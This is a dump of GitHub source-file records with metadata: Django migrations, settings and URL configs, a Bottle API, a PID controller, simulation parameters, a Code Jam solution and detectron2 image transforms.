852b88ba81716981f09e0de47c7e45d2e8cb4f9b
|
fcce37f4e27c3a61573b93247dd35cea8642d0d9
|
/product/migrations/0012_auto_20210203_1045.py
|
d74ab5bf89a18eac9f504e6704cbd104a53e34ca
|
[] |
no_license
|
olayiwolaA/Dropshipping-e-commercial-website
|
813deffde03e3a89ce43de0778743abd64472464
|
2ff202c54409986acd118758be564a7c4795d195
|
refs/heads/master
| 2023-03-30T15:37:21.983625
| 2021-03-19T05:09:25
| 2021-03-19T05:09:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 634
|
py
|
# Generated by Django 3.0.11 on 2021-02-03 03:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('product', '0011_slider'),
]
operations = [
migrations.AlterModelOptions(
name='comment',
options={'ordering': ('create_at',)},
),
migrations.AddField(
model_name='comment',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='replies', to='product.Comment'),
),
]
|
[
"59214516+miatran1109@users.noreply.github.com"
] |
59214516+miatran1109@users.noreply.github.com
|
5b30f0bc4e29e549e6d4270326a55defe2e385f0
|
0d7269e8f02d8a234c092bfda91d9f44fe670d2e
|
/w7-d5-docker/api.py
|
abb3d64a5dc26da4a01df753f1a0a18e0ce5ed6d
|
[] |
no_license
|
Hermenegildo12/Apuntes-Clases
|
e2a0ded9459a61209ab884548926d941da1eb2da
|
4cf51bcec494001336607da00f6c555c3691dc18
|
refs/heads/master
| 2020-08-09T17:21:14.617496
| 2019-10-10T08:08:15
| 2019-10-10T08:08:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 496
|
py
|
from bottle import route, run, template
import random
def randomName():
nombres = ["Pepe","Juan","Antonio"]
n = random.choice(nombres)
print("El nombre es {}".format(n))
return n
@route('/')
def index():
print("hola")
return {"hola":"que tal"}
@route('/random')
def imprimeNombreRandom():
return {"name":randomName()}
configuredName = randomName()
@route('/onlyone')
def imprimeNombreRandom2():
return {"name":configuredName}
run(host='0.0.0.0', port=8080)
|
[
"marc@faable.com"
] |
marc@faable.com
|
2f851e10a4a8ac7f3fec110a2c904089aa26c811
|
72af02a089d3c62b871ce44960c53469566486a8
|
/apis/serializers.py
|
a853c26a9f02cb602e643c326d70b0861b7acb85
|
[] |
no_license
|
marahnairat/e-commerce
|
20f1be8142f52420a4ccdc81f9d64bd275fa394b
|
bbfa6842ade5f75c30bdac0374b1fe6e06bf89f4
|
refs/heads/master
| 2023-01-21T11:49:22.043488
| 2020-11-29T16:00:13
| 2020-11-29T16:00:13
| 316,985,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 310
|
py
|
from rest_framework import serializers
# import model from models.py
from .models import GeeksModel
# Create a model serializer
class GeeksSerializer(serializers.HyperlinkedModelSerializer):
# specify model and fields
class Meta:
model = GeeksModel
fields = ('title', 'description')
|
[
"48821626+marahnairat@users.noreply.github.com"
] |
48821626+marahnairat@users.noreply.github.com
|
3140159f5d061f4a6d4a188a48db47489af2e417
|
458b1133df5b38a017f3a690a624a54f0f43fda7
|
/PaperExperiments/XHExp519/parameters.py
|
fd1677d3c8ae19cf862191018452b01ffa4bd8f3
|
[
"MIT"
] |
permissive
|
stefan-c-kremer/TE_World2
|
9c7eca30ee6200d371183c5ba32b3345a4cc04ee
|
8e1fae218af8a1eabae776deecac62192c22e0ca
|
refs/heads/master
| 2020-12-18T14:31:00.639003
| 2020-02-04T15:55:49
| 2020-02-04T15:55:49
| 235,413,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,621
|
py
|
# parameters.py
"""
Exp 519 - {'Initial_genes': '500', 'Host_mutation_rate': '0.03', 'TE_progeny': '0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3', 'TE_Insertion_Distribution': 'Flat()', 'Carrying_capacity': '30', 'TE_excision_rate': '0.5', 'Junk_BP': '1.4', 'Gene_Insertion_Distribution': 'Flat()', 'mutation_effect': '0.01', 'TE_death_rate': '0.0005'}
"""
from TEUtil import *;
# note that "#" indicates a comment
# set the following to True if you want messages printed to the screen
# while the program runs - search for these keywords in TESim.py to see
# what each one prints out
output = {
"SPLAT": False,
"SPLAT FITNESS": False,
"INITIALIZATION": False,
"GENERATION": True,
"HOST EXTINCTION": True,
"TE EXTINCTION": True,
"TRIAL NO": True,
"GENE INIT": False,
"TE INIT": False,
};
TE_Insertion_Distribution = Flat();
Gene_Insertion_Distribution = Flat();
# Triangle( pmax, pzero ) generates values between pmax and pzero with
# a triangular probability distribution, where pmax is the point of highest
# probability, and pzero is the point of lowest probability
# - you can change the orientation of the triangle by reversing the values
# of pmax and pzero
# Flat() generates values between 0 and 1 with uniform probability
Gene_length = 1000; # use 1000?
TE_length = 1000; # use 1000?
TE_death_rate = 0.0005;
TE_excision_rate = 0.5; # set this to zero for retro transposons
# for retro transposons this is the probability of the given number of progeny
# for dna transposons this is the probability of the given number of progeny
# ___PLUS___ the original re-inserting
TE_progeny = ProbabilityTable( 0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3 );
Initial_genes = 500;
Append_gene = True; # True: when the intialization routine tries to place
# a gene inside another gene, it instead appends it
# at the end of the original gene (use this with small
# amounts of Junk_BP).
# False: when the intialization routine tries to place
# a gene inside another gene, try to place it somewhere
# else again (don't use theis option with samll amounts
# of Junk_BP).
Initial_TEs = 1;
MILLION = 1000000;
Junk_BP = 1.4 * MILLION;
Host_start_fitness = 1.0;
Host_mutation_rate = 0.03;
Host_mutation = ProbabilityTable( 0.40, lambda fit: 0.0,
0.30, lambda fit: fit - random.random()*0.01,
0.15, lambda fit: fit,
0.15, lambda fit: fit + random.random()*0.01
);
# what happens when a TA hits a gene
Insertion_effect = ProbabilityTable(0.30, lambda fit: 0.0,
0.20, lambda fit: fit - random.random()*0.01,
0.30, lambda fit: fit,
0.20, lambda fit: fit + random.random()*0.01
);
Carrying_capacity = 30;
Host_reproduction_rate = 1; # how many offspring each host has
Host_survival_rate = lambda propfit: min( Carrying_capacity * propfit, 0.95 );
# propfit = proportion of fitness owned by this individual
Maximum_generations = 1500;
Terminate_no_TEs = True; # end simulation if there are no TEs left
# seed = 0;
seed = None; # if seed = None, the random number generator's initial state is
# set "randomly"
save_frequency = 50; # Frequency with with which to save state of experiment
saved = None; # if saved = None then we start a new simulation from scratch
# if saves = string, then we open that file and resume a simulation
|
[
"stefan@kremer.ca"
] |
stefan@kremer.ca
|
41288e7817a58ec0db1f90d9669ca3c7bb66f47d
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/pg_2323+049/sdB_pg_2323+049_coadd.py
|
353e65f7e87003087591089f987512c08696bbea
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[351.527458,5.271081], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_pg_2323+049/sdB_pg_2323+049_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_pg_2323+049/sdB_pg_2323+049_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
a7ce4d598ae0cebc4ab35db71bf5a1a5e34a7eb4
|
3c988068cad8cf323b1f51ec81570c244341b0d3
|
/MxOnline/urls.py
|
a1294a28e19179e70854f0cd5e3157ef25f6971a
|
[] |
no_license
|
framelei/MxOnline
|
68ad16898890699bf5a2574fa957ab2ea12a6622
|
a6e05db44fc15a0e0ab0498483ee74af69b674a3
|
refs/heads/master
| 2020-04-14T16:49:45.106566
| 2019-01-03T10:59:10
| 2019-01-03T10:59:10
| 163,962,533
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,213
|
py
|
#_*_ encoding:utf-8 _*_
"""MxOnline URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, url
2. Add a URL to urlpatterns: url('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
import xadmin
from django.views.static import serve
from MxOnline.settings import MEDIA_ROOT
from django.urls import path,include,re_path
from django.views.generic import TemplateView
from users.views import LoginView,RegisterView,ActiveUserView,ForgetPwdView,ResetView,ModifyPwdView,LogoutView
from organization.views import OrgView
urlpatterns = [
path('xadmin/', xadmin.site.urls),
path('', TemplateView.as_view(template_name='index.html'),name='index'),
# url('login/',views.user_login,name = 'login'), #修改login路由
path('login/',LoginView.as_view(),name = 'login'),
path('logout/', LogoutView.as_view(), name="logout"),
path('register/',RegisterView.as_view(),name = 'register'),
path('captcha/',include('captcha.urls')),
re_path('active/(?P<active_code>.*)/',ActiveUserView.as_view(),name='user_active'),
path('forget/',ForgetPwdView.as_view(),name='forget_pwd'),
re_path('reset/(?P<active_code>.*)/',ResetView.as_view(), name='reset_pwd'),
path('modify_pwd/', ModifyPwdView.as_view(), name='modify_pwd'),
# 处理图片显示的url,使用Django自带serve,传入参数告诉它去哪个路径找,我们有配置好的路径MEDIAROOT
re_path(r'^media/(?P<path>.*)', serve, {"document_root": MEDIA_ROOT }),
# 课程机构url配置
path('org/',include('organization.urls',namespace='org')),
path("course/", include('course.urls', namespace="course")),
# 个人中心
path("users/", include('users.urls', namespace="users")),
]
|
[
"602009841@qq.com"
] |
602009841@qq.com
|
60d8c7a968a5927d299d221191f33054a11432cf
|
3a78155868c1f0d2e524caaf569545df0ff15198
|
/actions/utils.py
|
42433cbdd9d7fd486cbd362c034edcdd2ae22b41
|
[] |
no_license
|
yasharabbaslo/Social-Network
|
aad7c3393634b4c324afe83dd72697620079f752
|
2c2de4f710d686b55775881c1b767918622921ad
|
refs/heads/master
| 2022-12-11T02:26:45.664834
| 2020-02-12T07:34:24
| 2020-02-12T07:34:24
| 237,016,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
import datetime
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from .models import Action
def create_action(user, verb, target=None):
# check for any similar action made in the last minute
now = timezone.now()
last_minute = now - datetime.timedelta(seconds=60)
similar_actions = Action.objects.filter(user_id=user.id, verb= verb, created__gte=last_minute)
if target:
target_ct = ContentType.objects.get_for_model(target)
similar_actions = similar_actions.filter(target_ct=target_ct, target_id=target.id)
if not similar_actions:
# no existing actions found
action = Action(user=user, verb=verb, target=target)
action.save()
return True
return False
|
[
"yashar.abbaslo@gmail.com"
] |
yashar.abbaslo@gmail.com
|
e012ed501e1ccdfa43db999e6ac4bc794bd075a2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_199/2436.py
|
e0b05342601ef60ae06d1406be5647373b3e4075
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,056
|
py
|
def flip(line,start,count):
j=0;
i=start
while(j<count):
if(line[i]=='-'):
line= line[:i] + '+' + line[(i+1):]
i=i+1
else:
line= line[:i] + '-' + line[(i+1):]
i=i+1
j=j+1
return line;
def flipcount(line,size):
counter = 0;
i=0
temp = line
while(i<len(line)):
if(line[i]=='-'):
rem = len(line)-i+1
if(rem>size):
line = flip(line,i,size);
else:
return "IMPOSSIBLE"
#print line
i=0
counter=counter+1
if(line==temp):
return "IMPOSSIBLE"
elif(line[i]=='+'):
i=i+1
return counter
t = int(raw_input())
l = []
z = []
x=0
while(x<t):
p,q = raw_input().split()
l.append(p)
q=int(q)
z.append(q)
x=x+1
x=0
while(x<t):
ans = str(flipcount(l[x],z[x]))
print "case #%d: %s" % (x+1,ans)
x=x+1
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
8f0642e242649e92712114efe54aa90f770a5afd
|
b5d87a5a7f74147754fc933e21e347f083f9923b
|
/algo/verkefni 2/10_challenge_find_eulerian_tour.py
|
6765ffa89d6dc0ed7a60838ca67e8c8159bba6e4
|
[] |
no_license
|
GunnarThorunnarson/2018-vor
|
4604e45b20280258a18de6210e6109174dcf564e
|
29a5830b83aa02c30822c23493db876897f29244
|
refs/heads/master
| 2021-04-06T05:33:55.856688
| 2018-02-23T14:11:29
| 2018-02-23T14:11:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 613
|
py
|
# Find Eulerian Tour
#
# Write a function that takes in a graph
# represented as a list of tuples
# and return a list of nodes that
# you would follow on an Eulerian Tour
#
# For example, if the input graph was
# [(1, 2), (2, 3), (3, 1)]
# A possible Eulerian tour would be [1, 2, 3, 1]
def find_eulerian_tour(graph):
# your code here
return []
def test_tour(graph, tour):
t = tour
g = graph
a = None
b = None
while len(t) > 2:
a = t.pop(0)
b = t[0]
# print(a, "->", b)
a = t.pop(0)
b = t.pop(0)
print (a, " -> ", b)
test_tour([], [1, 2, 3, 4])
|
[
"neptunus@hirt.is"
] |
neptunus@hirt.is
|
d957238cbd637abd675ff3ee440421189d23e6f5
|
19e8fcfa0ad0a4462a3ee88a6e18506284bbc963
|
/rango/migrations/0006_category_slug.py
|
c05486e3964de6d48bd595f5e76ce935811bc6b7
|
[] |
no_license
|
YanSym/tangowithdjango
|
c29fe31b0a67fa88832191912f94547551a4eb9a
|
c0f9785f278e9ac833bf23deecae3bb90d9eac1c
|
refs/heads/master
| 2021-01-22T09:48:15.667370
| 2015-03-11T13:46:04
| 2015-03-11T13:46:04
| 29,487,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('rango', '0005_remove_category_slug'),
]
operations = [
migrations.AddField(
model_name='category',
name='slug',
field=models.SlugField(default='temp'),
preserve_default=False,
),
]
|
[
"yan.vsym1@gmail.com"
] |
yan.vsym1@gmail.com
|
73fd8c964d09188d6db73287316cf1a31ef99828
|
cc0b6c03303ac30a147e0a6748bf716d098bec21
|
/tree/tree/settings.py
|
d7e17c4e2e65a61d77247fffb1db754e91caeb98
|
[] |
no_license
|
aronasorman/django-project
|
59f18b29beaa104f5fb7bf8756298f68fa13f37a
|
b3e46b9fe3746ab9a77d893d31f1dd4f15bb83f7
|
refs/heads/master
| 2020-12-30T19:58:17.105159
| 2014-02-10T06:35:10
| 2014-02-10T06:35:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,262
|
py
|
"""
Django settings for tree project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'template')
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL ="/media/"
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 't9^-#o&4y98y-6xby(-an#f69$)s6ks-hsea$1msej3ygr-q5k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
#django.template.loaders.eggs.Loader',
)
ROOT_URLCONF = 'tree.urls'
WSGI_APPLICATION = 'tree.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
|
[
"mooc-31@mooc31-desktop.(none)"
] |
mooc-31@mooc31-desktop.(none)
|
c0f5e0bed69f86c5eb7a5a3b2e9c90fbb6ca1dd9
|
3c066b3e449d6a8efd3a165955d3176ef08d9180
|
/analyze_input_threat_count.py
|
17ffdff7f208ec277a19b75969737758d0dd3f2d
|
[] |
no_license
|
InceptAi/body_scan
|
bf30b47b2fcc0e4a1fb04d3cb89f57f38f76b8ee
|
53bda38417f0223dcad8ccbad019c05a9fa42267
|
refs/heads/master
| 2021-03-24T09:43:25.441415
| 2017-12-14T01:06:45
| 2017-12-14T01:06:45
| 112,533,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
from myimports import *
#----------------------------------------------------------------------------------------
# get_hit_rate_stats(infile): gets the threat probabilities in a useful form
#
# infile: labels csv file
#
# returns: a dataframe of the summary hit probabilities
#
#----------------------------------------------------------------------------------------
def get_hit_rate_stats(infile):
# pull the labels for a given patient
df = pd.read_csv(infile)
# Separate the zone and patient id into a df
df['Subject'], df['Zone'] = df['Id'].str.split('_',1).str
df = df[['Subject', 'Zone', 'Probability']]
# make a df of the sums and counts by zone and calculate hit rate per zone, then sort high to low
df_summary = df.groupby('Zone')['Probability'].agg(['sum','count'])
df_summary['Zone'] = df_summary.index
df_summary['pct'] = df_summary['sum'] / df_summary['count']
df_summary.sort_values('pct', axis=0, ascending= False, inplace=True)
return df_summary
# unit test -----------------------
#df = get_hit_rate_stats(THREAT_LABELS)
#df.head()
#------------------------------------------------------------------------------------------
# chart_hit_rate_stats(df_summary): charts threat probabilities in desc order by zone
#
# df_summary: a dataframe like that returned from get_hit_rate_stats(...)
#
#-------------------------------------------------------------------------------------------
def chart_hit_rate_stats(df_summary):
fig, ax = plt.subplots(figsize=(15,5))
sns.barplot(ax=ax, x=df_summary['Zone'], y=df_summary['pct']*100)
#plt.show()
# unit test ------------------
#chart_hit_rate_stats(df)
#------------------------------------------------------------------------------------------
# print_hit_rate_stats(df_summary): lists threat probabilities by zone
#
# df_summary: a dataframe like that returned from get_hit_rate_stats(...)
#
#------------------------------------------------------------------------------------------
def print_hit_rate_stats(df_summary):
# print the table of values readbly
print ('{:6s} {:>4s} {:6s}'.format('Zone', 'Hits', 'Pct %'))
print ('------ ----- ----------')
for zone in df_summary.iterrows():
print ('{:6s} {:>4d} {:>6.3f}%'.format(zone[0], np.int16(zone[1]['sum']), zone[1]['pct']*100))
print ('------ ----- ----------')
print ('{:6s} {:>4d} {:6.3f}%'.format('Total ', np.int16(df_summary['sum'].sum(axis=0)),
( df_summary['sum'].sum(axis=0) / df_summary['count'].sum(axis=0))*100))
# unit test -----------------------
#print_hit_rate_stats(df)
#testing get_hit_rate_stats
print (THREAT_LABELS)
df = get_hit_rate_stats(THREAT_LABELS)
#print (df)
print_hit_rate_stats(df)
#df.head()
#chart_hit_rate_stats(df)
|
[
"vivek@obiai.tech"
] |
vivek@obiai.tech
|
389fbf646a8335c9d4c2531567cf425f231c28a5
|
fc6b692ff0e25bae6d451f3f7d3ac8ee71fb940f
|
/code/pid.py
|
352ed547c9d8a7f75b4b3976eb5ec291dde32ba6
|
[] |
no_license
|
dp12/RoboND-Rover-Project-1
|
b5bdd81d1dfba62051f58de4c80a644d5ea2867a
|
4ecde978e2f189c8247407a9a986eb376dae6894
|
refs/heads/master
| 2021-01-23T09:09:56.188726
| 2017-12-26T07:31:37
| 2017-12-26T07:31:37
| 102,562,204
| 0
| 0
| null | 2017-09-06T04:21:34
| 2017-09-06T04:21:34
| null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
class Pid():
def __init__(self, kp = 0.0, ki = 0.0, kd = 0.0, set_point = 0):
self.kp = kp
self.ki = ki
self.kd = kd
self.set_point = set_point
self.integrated_error = 0.0
self.last_error = 0.0
def update(self, measurement):
# Calculate proportional error
error = self.set_point - measurement
# if (self.set_point < 0.5):
# print("pid error %f" % error)
# Calculate integral error
self.integrated_error += error
# Calculate derivative
derivative_error = error - self.last_error
self.last_error = error
u = (self.kp * error) + (self.ki * self.integrated_error) + self.kd * (derivative_error)
return u
|
[
"dp12@github.com"
] |
dp12@github.com
|
9aaf4826bfa48578629394a3c6e020212e9d6a04
|
d8010fd033ec0b36a87d9a058487d738befc3c17
|
/detectron2/data/transforms/transform.py
|
c8fb7e03d589939ea01c8388c2d4128d3f7a2cf2
|
[] |
no_license
|
bobwan1995/ReIR-WeaklyGrounding.pytorch
|
0efa0a616b18f9fa3d89f0afde1a6528efca1a8d
|
2a962c335541c981149a042794ee508e0e7226f4
|
refs/heads/main
| 2023-08-11T12:55:42.977775
| 2021-10-09T00:25:15
| 2021-10-09T00:25:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,003
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# File: transform.py
import numpy as np
from fvcore.transforms.transform import HFlipTransform, NoOpTransform, Transform
from PIL import Image
__all__ = ["ExtentTransform", "ResizeTransform"]
class ExtentTransform(Transform):
"""
Extracts a subregion from the source image and scales it to the output size.
The fill color is used to map pixels from the source rect that fall outside
the source image.
See: https://pillow.readthedocs.io/en/latest/PIL.html#PIL.ImageTransform.ExtentTransform
"""
def __init__(self, src_rect, output_size, interp=Image.LINEAR, fill=0):
"""
Args:
src_rect (x0, y0, x1, y1): src coordinates
output_size (h, w): dst image size
interp: PIL interpolation methods
fill: Fill color used when src_rect extends outside image
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img, interp=None):
h, w = self.output_size
ret = Image.fromarray(img).transform(
size=(w, h),
method=Image.EXTENT,
data=self.src_rect,
resample=interp if interp else self.interp,
fill=self.fill,
)
return np.asarray(ret)
def apply_coords(self, coords):
# Transform image center from source coordinates into output coordinates
# and then map the new origin to the corner of the output image.
h, w = self.output_size
x0, y0, x1, y1 = self.src_rect
new_coords = coords.astype(np.float32)
new_coords[:, 0] -= 0.5 * (x0 + x1)
new_coords[:, 1] -= 0.5 * (y0 + y1)
new_coords[:, 0] *= w / (x1 - x0)
new_coords[:, 1] *= h / (y1 - y0)
new_coords[:, 0] += 0.5 * w
new_coords[:, 1] += 0.5 * h
return new_coords
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation, interp=Image.NEAREST)
return segmentation
class ResizeTransform(Transform):
"""
Resize the image to a target size.
"""
def __init__(self, h, w, new_h, new_w, interp):
"""
Args:
h, w (int): original image size
new_h, new_w (int): new image size
interp: PIL interpolation methods
"""
# TODO decide on PIL vs opencv
super().__init__()
self._set_attributes(locals())
def apply_image(self, img, interp=None):
assert img.shape[:2] == (self.h, self.w)
pil_image = Image.fromarray(img)
interp_method = interp if interp is not None else self.interp
pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)
ret = np.asarray(pil_image)
ret = self.apply_padding(ret, True)
return ret
def apply_padding(self, data, is_img=False):
max_size = max(self.new_h, self.new_w)
if is_img:
new_data = np.zeros((max_size, max_size, data.shape[2]))
else:
new_data = np.zeros((max_size, max_size))
pad_h = int(np.floor(max_size-self.new_h)/2)
pad_w = int(np.floor(max_size-self.new_w)/2)
new_data[pad_h:pad_h+self.new_h, pad_w:pad_w+self.new_w, ...] = data
return new_data
def apply_coords(self, coords):
coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)
coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)
return coords
def apply_segmentation(self, segmentation):
assert segmentation.shape[:2] == (self.h, self.w)
pil_image = Image.fromarray(segmentation)
interp_method = Image.NEAREST
pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)
segmentation = np.asarray(pil_image)
segmentation = self.apply_padding(segmentation, False)
return segmentation
def HFlip_rotated_box(transform, rotated_boxes):
"""
Apply the horizontal flip transform on an rotated boxes.
Args:
rotated_boxes (ndarray): Nx5 floating point array of
(x_center, y_center, width, height, angle_degrees) format
in absolute coordinates.
"""
# Transform x_center
rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]
# Transform angle
rotated_boxes[:, 4] = -rotated_boxes[:, 4]
return rotated_boxes
def Resize_rotated_box(transform, rotated_boxes):
# Note: when scale_factor_x != scale_factor_y,
# the rotated box does not preserve the rectangular shape when the angle
# is not a multiple of 90 degrees under resize transformation.
# Instead, the shape is a parallelogram (that has skew)
# Here we make an approximation by fitting a rotated rectangle to the
# parallelogram that shares the same midpoints on the left and right edge
scale_factor_x = transform.new_w * 1.0 / transform.w
scale_factor_y = transform.new_h * 1.0 / transform.h
rotated_boxes[:, 0] *= scale_factor_x
rotated_boxes[:, 1] *= scale_factor_y
theta = rotated_boxes[:, 4] * np.pi / 180.0
c = np.cos(theta)
s = np.sin(theta)
# In image space, y is top->down and x is left->right
# Consider the local coordintate system for the rotated box,
# where the box center is located at (0, 0), and the four vertices ABCD are
# A(-w / 2, -h / 2), B(w / 2, -h / 2), C(w / 2, h / 2), D(-w / 2, h / 2)
# the midpoint of the left edge AD of the rotated box E is:
# E = (A+D)/2 = (-w / 2, 0)
# the midpoint of the top edge AB of the rotated box F is:
# F(0, -h / 2)
# To get the old coordinates in the global system, apply the rotation transformation
# (Note: the right-handed coordinate system for image space is yOx):
# (old_x, old_y) = (s * y + c * x, c * y - s * x)
# E(old) = (s * 0 + c * (-w/2), c * 0 - s * (-w/2)) = (-c * w / 2, s * w / 2)
# F(old) = (s * (-h / 2) + c * 0, c * (-h / 2) - s * 0) = (-s * h / 2, -c * h / 2)
# After applying the scaling factor (sfx, sfy):
# E(new) = (-sfx * c * w / 2, sfy * s * w / 2)
# F(new) = (-sfx * s * h / 2, -sfy * c * h / 2)
# The new width after scaling tranformation becomes:
# w(new) = |E(new) - O| * 2
# = sqrt[(sfx * c * w / 2)^2 + (sfy * s * w / 2)^2] * 2
# = sqrt[(sfx * c)^2 + (sfy * s)^2] * w
# i.e., scale_factor_w = sqrt[(sfx * c)^2 + (sfy * s)^2]
#
# For example,
# when angle = 0 or 180, |c| = 1, s = 0, scale_factor_w == scale_factor_x;
# when |angle| = 90, c = 0, |s| = 1, scale_factor_w == scale_factor_y
rotated_boxes[:, 2] *= np.sqrt(np.square(scale_factor_x * c) + np.square(scale_factor_y * s))
# h(new) = |F(new) - O| * 2
# = sqrt[(sfx * s * h / 2)^2 + (sfy * c * h / 2)^2] * 2
# = sqrt[(sfx * s)^2 + (sfy * c)^2] * h
# i.e., scale_factor_h = sqrt[(sfx * s)^2 + (sfy * c)^2]
#
# For example,
# when angle = 0 or 180, |c| = 1, s = 0, scale_factor_h == scale_factor_y;
# when |angle| = 90, c = 0, |s| = 1, scale_factor_h == scale_factor_x
rotated_boxes[:, 3] *= np.sqrt(np.square(scale_factor_x * s) + np.square(scale_factor_y * c))
# The angle is the rotation angle from y-axis in image space to the height
# vector (top->down in the box's local coordinate system) of the box in CCW.
#
# angle(new) = angle_yOx(O - F(new))
# = angle_yOx( (sfx * s * h / 2, sfy * c * h / 2) )
# = atan2(sfx * s * h / 2, sfy * c * h / 2)
# = atan2(sfx * s, sfy * c)
#
# For example,
# when sfx == sfy, angle(new) == atan2(s, c) == angle(old)
rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s, scale_factor_y * c) * 180 / np.pi
return rotated_boxes
HFlipTransform.register_type("rotated_box", HFlip_rotated_box)
NoOpTransform.register_type("rotated_box", lambda t, x: x)
ResizeTransform.register_type("rotated_box", Resize_rotated_box)
|
[
"liuyf3@shanghaitech.edu.cn"
] |
liuyf3@shanghaitech.edu.cn
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.